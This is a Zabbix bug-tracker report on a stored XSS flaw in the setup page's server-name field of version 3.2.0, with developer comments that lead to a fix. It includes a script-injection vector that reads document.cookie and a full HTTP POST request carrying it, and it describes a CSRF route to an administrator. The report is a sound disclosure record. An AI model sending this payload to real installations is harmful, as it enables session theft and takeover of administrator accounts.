[ZBX-11371] XSS in Server name Created: 2016 Oct 18  Updated: 2017 May 30  Resolved: 2016 Dec 08

Status: Closed
Project: ZABBIX BUGS AND ISSUES
Component/s: Frontend (F)
Affects Version/s: 3.2.0
Fix Version/s: 3.4.0alpha1

Type: Incident report Priority: Trivial
Reporter: Andrey Plastunov Assignee: Unassigned
Resolution: Fixed Votes: 0
Labels: vulnerability, xss
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

LAMP

Attachments: PNG File Screenshot from 2016-10-18 17-25-46.png    

 Description   

There is a Stored XSS vulnerability in Server name parameter

This parameter is specified during the initial setup, but since the /zabbix/setup.php still available after the setup and there is no protection against CSRF attacks, malicious attacker could convince Admin to execute the script via CSRF Attack

Vulnerable parameter is zbx_server_name
Example vector: </title><script>alert(document.cookie)</script>

Example request for setting up the Server name will be:
POST /zabbix/setup.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zabbix/setup.php
Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step

 Comments   
Comment by Aleksandrs Saveljevs [ 2016 Oct 24 ]

$ZBX_SERVER_NAME is meant to be a regular PHP variable in the read-only conf/zabbix.conf.php. So changing $ZBX_SERVER_NAME is essentially equivalent to changing PHP code for the entire Zabbix system. If one has access to Zabbix code, then one can do anything.

Regarding setup.php, it is only accessible to super admins after Zabbix is installed. Is there any way how a non-admin can exploit it?

Comment by vitalijs.cemeris (Inactive) [ 2016 Nov 28 ]

(1) No translation string changes.

gunarspujats CLOSED

Comment by vitalijs.cemeris (Inactive) [ 2016 Nov 28 ]

Fixed in the development branch svn://svn.zabbix.com/branches/dev/ZBX-11371

Comment by Natalja Romancaka [ 2016 Nov 28 ]

ui tested

Comment by Gunars Pujats (Inactive) [ 2016 Dec 07 ]

Tested

Comment by vitalijs.cemeris (Inactive) [ 2016 Dec 07 ]

Fixed in pre-3.3.0 r64250

Generated at Fri Apr 26 05:29:21 EEST 2024 using Jira 9.12.4#9120004-sha1:625303b708afdb767e17cb2838290c41888e9ff0.